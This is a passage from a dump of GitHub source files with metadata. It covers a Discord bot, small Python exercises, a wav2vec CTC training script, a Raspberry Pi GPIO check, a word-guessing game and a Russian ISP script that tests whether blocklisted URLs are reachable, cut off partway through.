and (i + j != 11) and (i != j): #Condição pra acessar só os elementos da área inferior.\r\n soma += M[i][j]\r\n\r\nmedia = soma / 144 #Média dos elementos da matriz.\r\n\r\nif Operacao == 'S': #Dependendo do input da operação, será impresso a soma ou a média na tela.\r\n print(f'{soma:.1f}')\r\nelif Operacao == 'M': \r\n print(f'{media:.1f}')","repo_name":"RodrigoSdeCarvalho/uri-online-judge","sub_path":"1188.py","file_name":"1188.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20900985547","text":"import nextcord\nfrom nextcord import AllowedMentions, Interaction, SlashOption, ChannelType, ApplicationCheckFailure\nfrom nextcord.ext import commands, tasks, application_checks\nimport os\nfrom dotenv import load_dotenv\nfrom cooldowns import CallableOnCooldown\nimport logging\n\nlogger = logging.getLogger('nextcord')\nlogger.setLevel(logging.DEBUG)\nhandler = logging.FileHandler(filename='nextcord.log', encoding='utf-8', mode='w')\nhandler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\nlogger.addHandler(handler)\n\nload_dotenv()\nTOKEN = os.getenv(\"TOKEN\")\nclient = commands.Bot(owner_ids=[482232269038288916])\n\n@client.event\nasync def on_ready():\n print(\"Bot hazır\")\n print(\"-----------------\")\n await client.change_presence(activity=nextcord.Game(name='asdfg'))\n\n@client.event\nasync def on_application_command_error(inter: nextcord.Interaction, error):\n error = getattr(error, \"original\", error)\n if isinstance(error, CallableOnCooldown):\n em = nextcord.Embed(color=0xff0000, title=\"**Fazla hızlısın!** :x:\", description=f\"{error.retry_after} saniye sonra tekrar dene.\")\n await inter.send(embed=em, ephemeral=True)\n elif isinstance(error, ApplicationCheckFailure):\n em = nextcord.Embed(color=0xff0000, title=\"**Error!** :x:\", 
description=f\"No permissions.\")\n await inter.send(embed=em, ephemeral=True)\n else:\n raise error\n\nfor fn in os.listdir(\"./cogs\"):\n if fn.endswith(\".py\"):\n client.load_extension(f\"cogs.{fn[:-3]}\")\n else:\n pass\n\n@client.slash_command(\n name=\"cog\"\n)\n@application_checks.is_owner()\nasync def cog(interaction: nextcord.Interaction):\n pass\n@cog.subcommand()\n@application_checks.is_owner()\nasync def load(interaction: nextcord.Interaction, extension: str):\n client.load_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog yüklendi!\")\n@cog.subcommand()\n@application_checks.is_owner()\nasync def unload(interaction: nextcord.Interaction, extension: str):\n client.unload_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog durduruldu!\")\n@cog.subcommand()\n@application_checks.is_owner()\nasync def reload(interaction: nextcord.Interaction, extension: str):\n client.reload_extension(f\"cogs.{extension}\")\n await interaction.send(\"cog yeniden yüklendi!\")\n\nclient.run(TOKEN)","repo_name":"JustBurakk/ahmetbot","sub_path":"ahmet-main.py","file_name":"ahmet-main.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39768941455","text":"#define two lists\r\na = [1,1,2,3,5,8,13,21,34,55,89]\r\nb = [1,2,3,4,5,6,7,8,9,10,11,12,13]\r\n\r\n#define an empty list for storing shared values\r\nc = []\r\n\r\n#iterate through one of the lists and check for each element whether it's a shared value or not\r\n'''it checks whether the length of the list is greater than zero because we remove all elements that are\r\nequal to the current element (including that element) in order to avoid duplicates'''\r\nwhile len(a)>0:\r\n\r\n #we always take the first element because after removing the previous element we end up with the next element\r\n #being in the index 0\r\n i = a[0]\r\n\r\n #check whether it exists in the other list as well\r\n if b.count(i)>0:\r\n\r\n #add it to the list of shared elements\r\n c.append(i)\r\n\r\n #remove all values equal to i from the first list in order to avoid duplicates\r\n for j in range(a.count(i)):\r\n a.remove(i)\r\n\r\nprint(c)\r\n","repo_name":"georgead01/TA_EXAM","sub_path":"second_question.py","file_name":"second_question.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37872359720","text":"import RPi.GPIO as GPIO\nimport time\n\ndef waitForSafety():\n #pin numbers\n sensor = 21\n led = 18\n button = 15\n\n #set up all the pins\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(sensor, GPIO.IN)\n GPIO.setup(button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #required for button usage\n GPIO.setup(led, GPIO.OUT)\n\n GPIO.output(led, False) #start with LED off\n print(\"Performing safety checks...\")\n print(\" \")\n\n while True:\n if (not GPIO.input(sensor)) and GPIO.input(button) == GPIO.HIGH:\n GPIO.output(led, True)\n print('Safety checks complete. 
Starting in 3s.')\n time.sleep(3)\n GPIO.cleanup()\n break\n else:\n GPIO.output(led, False)","repo_name":"shreyapatill/ecehonorslab","sub_path":"RubiksSolver/sensor_led_output.py","file_name":"sensor_led_output.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38392495428","text":"from typing import List\n\nimport pytest\n\nfrom StudyNotes.TestDevelopHomework.PhaseThreeHomework.CounterDemo.Counter import CounterDemoTest\n\ndef pytest_collection_modifyitems(\n session: \"Session\", config: \"Config\", items: List[\"Item\"]\n) -> None:\n for item in items:\n item.name = item.name.encode('utf-8').decode('unicode-escape')\n item._nodeid = item.nodeid.encode('utf-8').decode('unicode-escape')\n\n\n@pytest.fixture(scope=\"class\")\ndef counterBegin():\n print(\"开始计算\")\n # 实例化CounterDemo类\n counterDemoTest = CounterDemoTest()\n yield counterDemoTest\n\n print(\"计算结束\")","repo_name":"Zuoxixian/TESTDEVELOP","sub_path":"StudyNotes/TestDevelopHomework/PhaseThreeHomework/TestCounterDemo/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25921571963","text":"\"\"\"\nan example of create and get stream\n\"\"\"\n\n\nfrom streamr import Client, Option\n\n# To create or get a stream you should create a client object at first\nmy_option = Option.get_default_option()\nmy_option.api_key = 'your-api-key'\n\nmy_client = Client(my_option)\n\n# To create a new stream, you can use 'create_stream' or 'get_or_create_stream' with a 'name' parameter\n# Note that create_stream is running forcefully.\n# That means you can create two stream with same name but the stream_ids are different\n\n\nstream1 = my_client.create_stream('stream-test-1')\n\nstream2 = my_client.get_or_create_stream('stream-test-2')\n\n# To get a stream, you can use 'get_stream_by_name' or get_stream_by_id' method\n\n# get_stream_by_name will return all the streams with steam name\n# the return is a list object containing the information of all streams\nstream3 = my_client.get_stream_by_name('stream-test-2')\n\n# get stream by id will return the stream with the stream_id\n# the return is a dictionary containing the information of the stream\n# Before using this methods, you should replace the stream_id with a 32 bytes strings, which\n# can be found in the stream page, also can be obtained using the get_stream_by_name method.\nstream_id = stream2[0]['id']\nstream4 = my_client.get_stream_by_id(stream_id)\n","repo_name":"streamr-dev/streamr-client-python","sub_path":"examples/createOrGetStream.py","file_name":"createOrGetStream.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"16992563670","text":"import matplotlib\nmatplotlib.use('QtAgg')\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport numpy as np\nfrom scipy.optimize import dual_annealing\n\ndef polar_to_cartesian(m):\n return np.array([\n np.sin(m[0]) * np.cos(m[1]),\n np.sin(m[0]) * np.sin(m[1]),\n np.cos(m[0])\n ])\n\ndef filter_indexes(x):\n return np.any(x[0] < x[1])\n\n\nclass Thomson(object):\n def __init__(self) -> None:\n self.nb_call = 0\n self.best_value = np.inf\n\n def objective(self, x):\n x_mat = np.array(x).reshape(len(x) // 2, 2, order='F')\n\n def rdist_fun(x):\n return 
np.array(\n 1 / np.sqrt(np.sum(\n (y_mat[x[0]] - y_mat[x[1]])** 2))\n )\n\n y_mat = np.apply_along_axis(polar_to_cartesian, axis=1, arr=x_mat)\n seq_vec = np.arange(0, x_mat.shape[0])\n indexes = np.array(np.meshgrid(seq_vec, seq_vec)).T.reshape(-1, 2)\n filter_vec = np.apply_along_axis(filter_indexes, axis=1, arr=indexes)\n indexes = indexes[filter_vec]\n rdist = np.apply_along_axis(rdist_fun, axis=1, arr=indexes)\n fvalue = np.sum(rdist)\n if fvalue < self.best_value:\n self.best_value = fvalue\n update_plot(x, fvalue, self.nb_call, self.best_value, better=True)\n else:\n update_plot(x, fvalue, self.nb_call, self.best_value, better=False)\n self.nb_call +=1 \n return fvalue\n\n\nn_particles = 12\nlw = np.array([0] * (n_particles * 2))\nup = np.concatenate((\n np.repeat(np.pi, n_particles),\n np.repeat(2 * np.pi, n_particles)), axis=None)\nbounds=list(zip(lw, up))\n\n\nfig = plt.figure()\nax = fig.add_subplot(projection='3d')\n\nu, v = np.mgrid[0:2*np.pi:20j, 0:np.pi:20j]\nx = np.cos(u)*np.sin(v)\ny = np.sin(u)*np.sin(v)\nz = np.cos(v)\n\ndef init_sphere():\n ax.plot_wireframe(x, y, z, color=\"grey\", linewidth=0.2)\n ax.plot_surface(x, y, z, color=\"g\", alpha=0.1)\n return fig,\n\ndef update_plot(x, f, nb_call, best_value, better):\n ax.view_init(elev=20, azim=nb_call % 360 )\n ax.set_title(f'Nb function call: {nb_call} Energy: {best_value:.6f}')\n if better:\n plt.cla()\n init_sphere()\n x_mat = np.array(x).reshape(len(x) // 2, 2, order='F')\n y_mat = np.apply_along_axis(polar_to_cartesian, axis=1, arr=x_mat)\n for i in range(n_particles):\n ax.scatter(y_mat[i, 0], y_mat[i, 1], y_mat[i, 2])\n seq_vec = np.arange(0, n_particles)\n indexes = np.array(np.meshgrid(seq_vec, seq_vec)).T.reshape(-1, 2)\n filter_vec = np.apply_along_axis(filter_indexes, axis=1, arr=indexes)\n indexes = indexes[filter_vec]\n for i in range(indexes.shape[0]):\n ax.plot(\n [\n y_mat[indexes[i, 0], 0],\n y_mat[indexes[i, 1], 0],\n ],\n [\n y_mat[indexes[i, 0], 1],\n y_mat[indexes[i, 1], 1],\n ],\n [\n y_mat[indexes[i, 0], 2],\n y_mat[indexes[i, 1], 2],\n ], linewidth=0.9,\n )\n\n fig.canvas.draw()\n fig.canvas.flush_events()\n\nplt.ion()\ninit_sphere()\nax.view_init(elev=20, azim=(90))\nthomson = Thomson()\nres = dual_annealing(thomson.objective, bounds=bounds)\n\n\n","repo_name":"sgubianpm/pyconie2022","sub_path":"thomson.py","file_name":"thomson.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72056921962","text":"import momo\nimport numpy as np\nfrom math import *\nfrom __common__ import *\n\ndef max_idx( value, reference ):\n cur_idx = -1\n for i in xrange( len( reference ) ):\n if value >= reference[i]:\n cur_idx = i\n return cur_idx\n \n\ndef compute_feature( reference, frame, radius = 3 ):\n feature = np.array( [0.] 
* FEATURE_LENGTH, dtype = np.float32 )\n\n for i in xrange( len( frame ) ):\n rel_x = frame[i][:2] - reference[:2]\n l_x = np.linalg.norm( rel_x )\n\n n = rel_x / l_x\n e = frame[i][:2] / np.linalg.norm( frame[i][:2] )\n cos_phi = np.dot( -n, e )\n force = ( LAMBDA + 0.5 * ( 1 - LAMBDA ) * ( 1 + cos_phi ) ) * exp( 2 * radius - l_x ) \n i = max_idx( force, ANGLES )\n if force > 0.5:\n feature[max( i, 0 )] += 1\n return feature\n\n\n\n","repo_name":"dichodaemon/momo","sub_path":"python/momo/features/helbing/compute_feature.py","file_name":"compute_feature.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26878956407","text":"#!/usr/bin/env python3\n\nimport os\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader, random_split\nimport pytorch_lightning as pl\nimport argparse\nimport yaml\nimport random\nimport numpy as np\nimport logging\nfrom waterfall import models\nfrom waterfall.utils import datapipe, datapipe_manual_ctc, datapipe_k2\nfrom waterfall.manual_ctc import eta_scheduler\nimport wandb\n\n\ndef main(args):\n cfg = yaml.load(open(args.config), Loader=yaml.loader.SafeLoader)\n pl.seed_everything(cfg['seed'], workers=True)\n\n batch_size = cfg['batch_size'] if args.batch_size == 0 else args.batch_size\n\n if cfg['loss'] == 'ctc':\n Dataset = datapipe.Dataset\n collate_fn = datapipe.collate_fn\n elif cfg['loss'] in ['ctc_fb', 'ctc_softmax']:\n Dataset = datapipe_manual_ctc.Dataset\n collate_fn = datapipe_manual_ctc.collate_fn\n elif cfg['loss'] in ['ctc_k2', 'k2']:\n Dataset = datapipe_k2.Dataset\n collate_fn = datapipe_k2.collate_fn_sorted\n\n if cfg['loss'] in ['ctc_k2', 'k2']:\n train_data = Dataset(args.train_set,\n args.lang_dir, token_type='phones')\n dev_data = Dataset(args.dev_set,\n args.lang_dir, token_type='phones')\n else:\n train_data = Dataset(args.train_set,\n args.lang_dir)\n dev_data = Dataset(args.dev_set,\n args.lang_dir)\n\n train_gen = DataLoader(train_data,\n batch_size=batch_size,\n shuffle=True,\n num_workers=cfg['num_workers'],\n persistent_workers=True,\n collate_fn=collate_fn)\n dev_gen = DataLoader(dev_data,\n batch_size=batch_size,\n shuffle=False,\n num_workers=cfg['num_workers'],\n persistent_workers=True,\n collate_fn=collate_fn)\n\n model = models.Wav2VecFineTuningDiverse(\n train_data.lang.num_nn_output, cfg=cfg, lang_dir=args.lang_dir)\n\n os.makedirs('exp/%s' % (args.name), exist_ok=True)\n model_checkpoint= pl.callbacks.ModelCheckpoint(monitor='valid_loss',\n save_top_k=1 if 'save_top_k' not in cfg.keys(\n ) else cfg['save_top_k'],\n every_n_epochs=1,\n filename='{epoch}-{valid_loss:.3f}',\n mode='min')\n callbacks = [model_checkpoint,\n pl.callbacks.LearningRateMonitor(logging_interval='step'),\n pl.callbacks.RichProgressBar(),\n pl.callbacks.RichModelSummary(max_depth=2)]\n\n if cfg['early_stopping']:\n callbacks.append(pl.callbacks.EarlyStopping(monitor='valid_loss',\n mode='min',\n patience=cfg['patience'],\n verbose=True))\n\n if 'auto_eta_scheduler' in cfg.keys() and cfg['auto_eta_scheduler']:\n callbacks.append(eta_scheduler.AutoEtaScheduler('valid_loss',\n delta_eta=cfg['delta_eta'],\n final_eta=cfg['final_eta'],\n patience=cfg['patience_eta'],\n verbose=True))\n\n accumulate_grad_batches = 1 # by default 1, args.accumulate_grad_batches has more priority than cfg['accumulate_grad_batches']\n if args.accumulate_grad_batches != 1:\n accumulate_grad_batches = 
args.accumulate_grad_batches\n elif 'accumulate_grad_batches' in cfg.keys():\n accumulate_grad_batches = cfg['accumulate_grad_batches']\n\n logger = pl.loggers.WandbLogger(\n project=args.name, save_dir='exp/%s' % (args.name))\n logger.watch(model, log='all')\n\n if args.checkpoint:\n if not args.load_weights_only:\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n resume_from_checkpoint=args.checkpoint,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n else:\n model.load_state_dict(torch.load(args.checkpoint)['state_dict'])\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n else:\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n\n trainer.fit(model, train_gen, dev_gen)\n\n logger.log_metrics({'best_model_path': os.path.join(os.getcwd(), model_checkpoint.best_model_path),\n 'best_model_loss': model_checkpoint.best_model_score.item()})\n wandb.finish()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--train_set', help='Training set directory.', type=str)\n parser.add_argument('--dev_set', help='Dev set directory.', type=str)\n parser.add_argument('--lang_dir', help='Lang directory.', type=str)\n parser.add_argument('--config', help='Configuration file path.', type=str)\n parser.add_argument(\n '--name', help='Experiment name. Models will be stored in exp/$name/version*', type=str, default='ctc')\n parser.add_argument(\n '--gpus', help='Number of GPUs that used for training.', type=int, default=1)\n parser.add_argument(\n '--checkpoint', help='Resume from checkpoint.', type=str, default=None)\n parser.add_argument('--load_weights_only',\n help='Whether or not load weights only from checkpoint.', type=bool, default=False)\n parser.add_argument('--batch_size', help='The batch_size for training.', type=int, default=0)\n parser.add_argument(\n '--accumulate_grad_batches', help='The number of batches for gradient accumulation.', type=int, default=1)\n\n args = parser.parse_args()\n main(args)\n","repo_name":"ZhaoZeyu1995/Waterfall","sub_path":"waterfall/bin/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"13416865029","text":"# Imports the Google Cloud client library\nfrom google.cloud import translate\n\n# Instantiates a client\ntranslate_client = translate.Client()\n\ndef translate (text,target):\n\n translation = translate_client.translate(text, source_language = 'ja', target_language = target)\n return translation['translatedText']\n\n# The text to translate\n# text = u'です by Glamour'\n# The target language\n# target = 'pt'\n\n# Translates some text into Russian\n# translation = translate_client.translate(text, source_language = 'ja', target_language = target)\n\n#translate_client.get\n\n# print(u'Text: {}'.format(text))\n# print(u'Translation: 
{}'.format(translation['translatedText']))\n","repo_name":"rovanemoura/DESU-by-Glamour","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38563579519","text":"# Kelime Tahmin Oyunu\n# Önce rastgele bir kelime seçilecek (Bu bir fonksiyon olsun. Bir listenin içinden rastgele bir kelime seçip versin)\n# Kaç haklı oynamak istediğini oyuncuya soracak. 1 ile 25 arasında bir sayı seçmesi sağlanacak. Buna HakSayısı diyelim.\n# Rastgele seçilen Kelimenin harf sayısı kadar ekrana ****** basılacak.\n# ve Oyuncuya \"Tahminini gir\" diyecek. Bir harf girmek dışındaki girişlerde \"hatalı giriş yaptın\" diyecek.\n# Girilen harf, kelienin içinde varsa onu görünür yapacak. \"Tebrikler bir harf bildin. Kelime = ****A** \" gibi bir mesaj vrecek\n# Harf hatalı ise hakSayısından düşecek. Hak sayısı sıfır olunca \"KAYBETTİN\" mesajıyla oyun bitecek.\n# Tahmin hakları bitmeden kelimeyi bilirse \"TEBRİKLER KAZANDIN\" mesajı ile oyun bitecek.\n# kulanılacak kütüphane random\n# mesela 1 ile 20 arasında rastgele bir sayı üretecek fonksiyon : randint(0,19)\n#\n# Her seferinde ekrana yıldızlı yazdırmak için ipucu :\n# Tahmin girildiğinde, eğer girilen harf kelimenin içinde varsa bu harfi bulunanlar adlı bir diziye atarız\n# kelimenin eleman sayısını len() ile buluruz.\n# Bir döngüde her bir harf için şunu yaparız; bu harf bulunanlar dizisinde varsa harfin kendisini yazarız, yoksa * yazarız.\n# En sonunda,\nimport random\n\n#rastgele bir kelime bulma fonksiyonu\ndef KelimeSec():\n kelimeler = ['masa','kalemkutu','makas','ev','koyun','armut','kiraz','dolap','balina', \"berat\"]\n sayı = random.randint(0,len(kelimeler)-1)\n secim = kelimeler[sayı].lower()\n return secim\n\n\n\n#tahmin edilecek kelimeyi yıldızlar halinde yazar. Bulunan harfleri yerlerine yerleştirir.\ndef EkranaYaz(kelime,liste):\n yazılacak = \"\"\n for harf in kelime:\n if (harf in liste):\n yazılacak = yazılacak + harf\n else:\n yazılacak = yazılacak + \"*\"\n\n print(\"KELİME = \"+yazılacak)\n\n return yazılacak\n\n#giriş ekranını gösteren fonksiyon\ndef GirisEkranı():\n print(\"-----KELİME TAHMİN OYUNUNA-----\"\"\\n\"\n \"-----------HOŞGELDİNİZ---------\"\"\\n\"\n \"-------------------------------\"\"\\n\")\n\n# burada, kullanıcı doğru bir seçim girene kadar soruluyor\ndef OyunHakSayısı():\n hak = 0\n while True:\n try:\n hak = int(input(\"Kaç haklı oynamak istersiniz.\"))\n except:\n print(\"Hatalı giriş yaptınız\")\n continue\n if (hak > 25 or hak < 0):\n print(\"HATALI SEÇİM (1 ile 25 arasında seçim yapın) \")\n continue\n else:\n break\n return hak\n\n\n\n# Programın ana bölümü\n\nGirisEkranı()\n\nkelime = KelimeSec()\n\nuzunluk = len(kelime)\n\nbulunan_harfler = []\n\noyunhakkı = OyunHakSayısı()\n\nprint(\"*\" * uzunluk)\n\nwhile True:\n\n harf = input(\"Harf tahmin edin\")\n harf = harf.lower()\n if(harf in kelime):\n if(harf not in bulunan_harfler):\n bulunan_harfler.append(harf)\n else:\n oyunhakkı = oyunhakkı - 1\n print(\"{} hakkınız kaldı. 
\".format(oyunhakkı))\n\n if (oyunhakkı == 0):\n print(\"Oyunu kaybettin\")\n quit()\n\n ekranaYazılan = EkranaYaz(kelime,bulunan_harfler)\n\n# eğer tüm harfler bulundu ise kazandın deyip oyunu bitirsin\n if(kelime == ekranaYazılan):\n print(\"Oyunu kazandınız TEBRİKLER\")\n quit()\n\n\n\n\n","repo_name":"hasanlacin/Berat-Projeler","sub_path":"Kelime Tahmin Oyunu.py","file_name":"Kelime Tahmin Oyunu.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4216976168","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\ndef algorithm(number1, number2):\n m = number1\n n = number2\n start = True\n while(start):\n t = m // n\n r = m - n * t\n if r == 0:\n print(\"Наибольшим общим делителем для {} и {} есть {}\".format(number1, number2 , n))\n start = False\n else:\n m = n\n n = r\n\n","repo_name":"MaxAlekseevDev/Algorithms","sub_path":"Euclid_algorithm.py","file_name":"Euclid_algorithm.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24237968283","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom enum import Enum, unique\nimport urllib.request\n\n\n@unique\nclass Category(Enum):\n Android = '5562b410e4b00c57d9b94a92' # 安卓\n Frontend = '5562b415e4b00c57d9b94ac8' # 前端\n IOS = '5562b405e4b00c57d9b94a41' # iOS\n Backend = '5562b419e4b00c57d9b94ae2' # 后端\n Design = '5562b41de4b00c57d9b94b0f' # 设计\n Product = '569cbe0460b23e90721dff38' # 产品\n Freebie = '5562b422e4b00c57d9b94b53' # 工具资源\n Article = '5562b428e4b00c57d9b94b9d' # 阅读\n AI = '57be7c18128fe1005fa902de' # 人工智能\n All = 'all'\n\n\nARTICLETYPE = {\n 'hot': 'https://timeline-merger-ms.juejin.im/v1/get_entry_by_rank',\n 'new': 'https://timeline-merger-ms.juejin.im/v1/get_entry_by_timeline',\n}\n\n\ndef get_juejin(limit=20, category=Category.All, article_type='hot', src='sixgold'):\n if article_type == 'hot':\n url = ARTICLETYPE['hot']\n else:\n url = ARTICLETYPE['new']\n\n req_url = '%s?src=%s&limit=%s&category=%s' % (url, src, limit, category.value)\n\n def make_request():\n with urllib.request.urlopen(req_url) as f:\n yield f.read()\n\n yield from make_request()\n\nif __name__ == '__main__':\n for i in get_juejin(limit=5, category=Category.AI, article_type='new', src='sixgold'):\n print(i.decode('utf-8'))\n print(\"\\n\")","repo_name":"kobelover/juejin","sub_path":"juejin.py","file_name":"juejin.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"42002494260","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Импорты Python\nimport time, sys, threading, signal, ipaddress, gc, configparser, sqlite3, os\n\n# Сторонние пакеты\nimport requests\n\n# Наш конфигурационный файл\nconfig = configparser.ConfigParser()\nconfig.read('/etc/roskom/tools.ini')\n\n# База данных\ndb = sqlite3.connect(config['roskomtools']['database'])\n\n# Создадим таблицы результатов проверок\ncursor = db.cursor()\ncursor.execute(\"CREATE TABLE IF NOT EXISTS checks (check_id INTEGER PRIMARY KEY AUTOINCREMENT, check_when INTEGER, check_total INTEGER, check_available INTEGER, check_minutes INTEGER, check_seconds INTEGER, check_maxrss INTEGER)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS available_links (link_check_id INTEGER, link_when INTEGER, link_url TEXT)\")\ncursor.close()\ndb.commit()\n\n# Общие 
модули\nsys.path.append('/usr/share/roskomtools')\nimport rknparser\n\n# Время начала работы скрипта\nexecution_start = time.time()\n\n# Расставим затычки-мьютексы\nin_mutex = threading.Lock()\nout_mutex = threading.Lock()\n\n# Прикинемся браузером\nrequest_headers = {\n\t'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/49.0.2623.108 Chrome/49.0.2623.108 Safari/537.36',\n}\n\n# Текст для поиска в ответе\nsearch_text = config['check']['search_text'].encode('utf-8')\n\n# Счётчик обработанных ссылок (для отображения прогресса)\ncounter = 0\n\n# Наш воркер\nclass Worker(threading.Thread):\n\tdef __init__(self, thread_id, in_data, out_data, trace):\n\t\tthreading.Thread.__init__(self),\n\t\tself.thread_id = thread_id\n\t\tself.in_data = in_data\n\t\tself.out_data = out_data\n\t\tself.timeout = 3\n\t\tself.iter_count = 0\n\t\tself.total_count = len(in_data)\n\t\tself.trace = trace\n\n\tdef select_unprocessed(self):\n\t\twith in_mutex:\n\t\t\ttry:\n\t\t\t\tresult = self.in_data.pop()\n\t\t\texcept:\n\t\t\t\tresult = None\n\t\t\treturn result\n\n\tdef report_progress(self, item):\n\t\tglobal counter\n\t\tcounter += 1\n\t\tprint(u\"(%d of %d) [%s] %s\" % (counter, self.total_count, item['status'], item['url']))\n\n\tdef process_item(self, item):\n\t\tglobal request_headers, search_text\n\t\titem['checked'] = int(time.time())\n\n\t\ttry:\n\t\t\tresponse = requests.get(item['url'], timeout = self.timeout, stream = True, headers = request_headers)\n\t\t\tcontent = response.raw.read(10000, decode_content = True)\n\n\t\t\tif search_text in content:\n\t\t\t\titem['status'] = 'blocked'\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tpeer = response.raw._connection.sock.getpeername()\n\t\t\t\texcept:\n\t\t\t\t\titem['status'] = 'available'\n\t\t\t\telse:\n\t\t\t\t\tif peer is not None:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\taddress = ipaddress.ip_address(peer[0])\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\titem['status'] = 'available' # ???\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif address.is_private:\n\t\t\t\t\t\t\t\titem['status'] = 'local-ip'\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\titem['status'] = 'available'\n\t\t\t\t\telse:\n\t\t\t\t\t\titem['status'] = 'available'\n\t\texcept Exception as e:\n\t\t\titem['status'] = 'failure'\n\n\t\twith out_mutex:\n\t\t\tif self.trace:\n\t\t\t\tself.report_progress(item)\n\t\t\tself.out_data.append(item)\n\n\t\tself.iter_count += 1\n\t\tif (self.iter_count % 100) == 0:\n\t\t\tgc.collect()\n\n\tdef set_timeout(self, new_timeout):\n\t\tself.timeout = new_timeout\n\n\tdef run(self):\n\t\twhile True:\n\t\t\titem = self.select_unprocessed()\n\t\t\tif item is None:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tself.process_item(item)\n\n# Профилирование\nimport resource\n\ndef signal_handler(signal, frame):\n\tprint(\"Aborted by signal, exitting.\")\n\texit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\nsignal.signal(signal.SIGTERM, signal_handler)\nsignal.signal(signal.SIGQUIT, signal_handler)\n\nprint(\"Starting using %d threads\" % (int(config['check']['threads']),))\n\ntry:\n\tprint(\"Loading data...\")\n\tin_data = rknparser.load_urls(db)\n\tout_data = []\nexcept:\n\tprint(\"Failed to load data. 
Run rkn-load.py to load the registry and rkn-parse.py to parse it.\")\n\texit(-1)\n\nprint(\"Loading succeeded, starting check\")\n\n# Инициализируем наши рабочие потоки\nthreads = {}\nfor i in range(int(config['check']['threads'])):\n\tthreads[i] = Worker(i, in_data, out_data, True)\n\tthreads[i].set_timeout(int(config['check']['http_timeout']))\n\tthreads[i].setDaemon(True)\n\n# Разветвляемся\nfor index, thread in threads.items():\n\tthread.start()\n\n# Соединяемся\nfor index, thread in threads.items():\n\tthread.join()\n\n# На этом этапе у нас сформирована статистика в массиве out_data, получим данные для внесения в БД\ntimestamp = int(time.time())\ntotal_count = len(out_data)\navailable = [i for i in out_data if i['status'] == 'available']\n#unavailable = [i for i in out_data if i['status'] in ['blocked', 'failure', 'local-ip']]\navailable_count = len(available)\n\n# Предварительная оценка ресурсов для записи в лог\nstat = resource.getrusage(resource.RUSAGE_SELF)\n\n# Время окончания работы скрипта\nexecution_end = time.time()\nexecution_time = execution_end - execution_start\nexecution_minutes = int(execution_time / 60)\nexecution_seconds = (execution_time - (execution_minutes * 60))\n\n# Сохраним результат в БД\ncursor = db.cursor()\ndata = (timestamp, total_count, available_count, execution_minutes, execution_seconds, stat.ru_maxrss)\ncursor.execute(\"INSERT INTO checks (check_when, check_total, check_available, check_minutes, check_seconds, check_maxrss) VALUES (?, ?, ?, ?, ?, ?)\", data)\ncheck_id = cursor.lastrowid\nfor link in available:\n\tdata = (check_id, link['checked'], link['url'])\n\tcursor.execute(\"INSERT INTO available_links (link_check_id, 